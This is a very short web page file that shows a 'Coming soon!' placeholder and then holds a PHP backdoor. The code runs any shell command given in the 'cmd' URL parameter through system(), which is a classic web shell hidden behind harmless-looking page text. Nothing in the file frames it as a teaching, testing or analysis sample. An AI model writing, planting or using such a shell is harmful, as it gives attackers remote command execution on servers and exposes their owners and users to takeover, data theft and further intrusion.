Coming soon!

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>